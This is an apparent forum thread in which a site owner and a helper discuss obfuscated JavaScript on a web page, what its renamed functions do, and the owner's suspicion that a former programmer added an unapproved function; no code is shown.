The function h15 does math on the value supplied to it. The function h19 returns the value of the string supplied to it. Neither one displays anything or pops anything up. The code outside any function writes the unescaped strings in h2, which is defined somewhere else, to the screen. (The original code probably had meaningful variable and function names, so you could at least guess what they were for, but one of the things an obfuscator does is change the names into something meaningless.)
No, the "light box" popover effect is called through another line of code, using the include php function. However, when I deleted THIS encrypted code above, the popover effect stopped even though the short php include code that calls the popover file is still present in the page's source code. I've also learned, through someone who knows my old programmer, that he added another function to this very code (not necessarily after my approval). I just wanted to confirm and I don't like it when I have encrypted code on my pages. @davetrebas... I'll send you the code and page tomorrow.. right now I need to go to sleep.